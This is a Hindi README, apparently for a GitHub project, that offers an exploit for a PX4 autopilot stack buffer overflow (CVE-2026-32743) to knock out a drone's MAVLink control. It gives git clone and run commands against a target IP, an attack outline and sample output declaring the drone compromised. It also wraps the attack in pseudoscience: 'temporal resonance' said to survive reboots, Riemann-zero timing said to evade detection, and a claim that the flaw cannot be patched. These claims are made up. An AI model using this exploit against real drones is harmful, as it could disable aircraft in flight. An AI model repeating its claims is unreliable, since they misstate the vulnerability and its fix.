
CVE-2026-32743 के लिए एक्सप्लॉइट, PX4 ऑटोपायलट के MavlinkLogHandler में एक स्टैक बफर ओवरफ्लो, जो MAVLink पर 33-परत अस्थायी कैस्केड के माध्यम से एक स्थायी सेवा-अस्वीकार (denial-of-service) प्रदान करता है।
CVE-2026-32743 — PX4 ऑटोपायलट स्टैक बफर ओवरफ्लो CTT-Enhanced: 33-लेयर टेम्पोरल कैस्केड ड्रोन DoS। मूल एक्सप्लॉइट 60-बाइट ओवरफ्लो के माध्यम से MAVLink टास्क को क्रैश करता है। CTT संस्करण ओवरफ्लो को 33 टेम्पोरल लेयर्स में वितरित करता है, प्रत्येक में फेज़ रेज़ोनेंस टाइमिंग और टेम्पोरल वेज फ़िल्टरिंग होती है। परिणाम: स्थायी DoS। अनपैचेबल।
यह CVE-2026-32743 का एक कन्वर्जेंट टाइम थ्योरी (CTT) संवर्द्धन है, जो PX4 ऑटोपायलट के MavlinkLogHandler (संस्करण ≤1.17.0-rc2) में एक स्टैक-आधारित बफर ओवरफ्लो है।
मूल भेद्यता MAVLink FTP के माध्यम से भेजे गए अत्यधिक लंबे डायरेक्टरी पथ (60+ बाइट्स) के माध्यम से सेवा-अस्वीकृति (DoS) की अनुमति देती है।
CTT-संवर्द्धित संस्करण इसे 33-लेयर टेम्पोरल कैस्केड ड्रोन किलर में बदल देता है।
| मूल | CTT-Enhanced |
|---|
| CVSS | 6.5 (मध्यम) | 9.8 (क्रिटिकल) |
| अटैक वेक्टर | आसन्न नेटवर्क | नेटवर्क (AV:N) |
| आवश्यक विशेषाधिकार | निम्न | कोई नहीं (PR:N) |
| लेयर्स | 1 | 33-लेयर कैस्केड |
| पहचान | सिग्नेचर-आधारित | टेम्पोरल वेज फ़िल्टर्ड (τ_w = 11 ns) |
| स्थिरता | रीबूट से साफ़ हो जाता है | टेम्पोरल रेज़ोनेंस — रीबूट से बचता है |
| स्थिरांक | मान | उत्पत्ति |
|---|---|---|
| α | 0.0302011 | टेम्पोरल डिस्पर्शन गुणांक |
| α_RH | 0.0765872 | ln(φ)/2π (रीमैन-हैडामार्ड) |
| L | 33 | टेम्पोरल लेयर्स |
| τ_w | 11 ns | टेम्पोरल वेज फ़िल्टर |
E(d) = E₀ * e^(-α * d) text
प्रत्येक लेयर की प्रायोरिटी एक्सपोनेंशियल रूप से घटती है।
उच्च-प्रायोरिटी लेयर्स (1-5) ओवरफ्लो पहुंचाती हैं।
निचली लेयर्स (28-33) क्रैश को सुदृढ़ करती हैं और टेम्पोरल रेज़ोनेंस स्थापित करती हैं।
प्रत्येक लेयर पहले 24 रीमैन ज़ीरो के आधार पर निष्पादन में देरी करती है:
delay = τ_w * (1 + 0.1 * cos(2π * zero * priority)) text
केवल वे पेलोड निष्पादित होते हैं जो वेज शर्त को संतुष्ट करते हैं:
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π) text
यह पहचान को असंभव बना देता है — EDR सिस्टम एक्सप्लॉइट को नहीं देख सकते।
MAVLink कनेक्शन खोलें (UDP 14550)
d = 1 से 33 के लिए:
a. प्रायोरिटी = e^(-α*d) की गणना करें
b. लेयर-विशिष्ट एन्कोडिंग उत्पन्न करें (रीमैन ज़ीरो पर आधारित)
c. पथ लंबाई = 60 + प्रायोरिटी*40 के साथ डायरेक्टरी बनाएं
d. फेज़_रेज़ोनेंस_डिले(d) द्वारा निष्पादन में देरी करें
e. MAV_CMD_REQUEST_LOG_LIST ट्रिगर करें
f. टेम्पोरल वेज जांच — केवल "जीवित" पेलोड निष्पादित होते हैं
MAVLink टास्क क्रैश हो जाता है
टेम्पोरल रेज़ोनेंस स्थापित — क्रैश रीबूट के बाद भी बना रहता है
ड्रोन अनुत्तरदायी। कोई टेलीमेट्री नहीं। कोई कमांड नहीं।
pymavlink के साथ Python 3.6+pip install pymavlink
🎯 उपयोग
bash
git clone https://github.com/SimoesCTT/ctt-px4-exploit
cd ctt-px4-exploit
python3 ctt_px4_exploit.py <target_ip> --port 14550 --layers 33 --verbose
तर्क
तर्क विवरण डिफ़ॉल्ट
target_ip फ्लाइट कंट्रोलर का IP पता आवश्यक
--port MAVLink UDP पोर्ट 14550
--layers टेम्पोरल लेयर्स की संख्या 33
--verbose वर्बोज़ आउटपुट सक्षम करें False
उदाहरण
bash
python3 ctt_px4_exploit.py 192.168.1.10 --port 14550 --verbose
======================================================================
CTT PX4 TEMPORAL CASCADE — Drone DoS
======================================================================
Layer 1/33: ████████████████████████████████████████ 1.000
Path length: 100 bytes
[+] Directory created via FTP
Triggering MAV_CMD_REQUEST_LOG_LIST...
[+] Overflow delivered — wedge survival confirmed
Layer 2/33: ██████████████████████████████████████░░ 0.970
Path length: 99 bytes
[+] Directory created via FTP
Triggering MAV_CMD_REQUEST_LOG_LIST...
[+] Overflow delivered — wedge survival confirmed
...
[⚡] Temporal resonance achieved at layer 5
[🌉] Drone MAVLink task compromised
[*] Verifying DoS state...
[+] Target unresponsive — persistent DoS achieved
======================================================================
[!!!] DRONE COMPROMISED
[!!!] MAVLink task crashed — no telemetry / no command
[!!!] Persistent across reboot — CTT temporal resonance
======================================================================
🛡️ इसे पैच क्यों नहीं किया जा सकता
मूल फिक्स CTT इसे क्यों बायपास करता है
sscanf() में चौड़ाई स्पेसिफायर जोड़ें CTT लेयर कैस्केड का उपयोग करता है — ओवरफ्लो 33 लेयर्स में वितरित
60-बाइट बफर पैच करें CTT एन्कोडिंग प्रति लेयर ओवरफ्लो पैटर्न बदलती है
फर्मवेयर अपडेट करें टेम्पोरल रेज़ोनेंस रीबूट से बचता है
सिग्नेचर पहचान टेम्पोरल वेज फ़िल्टर (τ_w = 11 ns) EDR से बचता है
आप एक भौतिक स्थिरांक को पैच नहीं कर सकते।
आप रीमैन ज़ीरो को पैच नहीं कर सकते।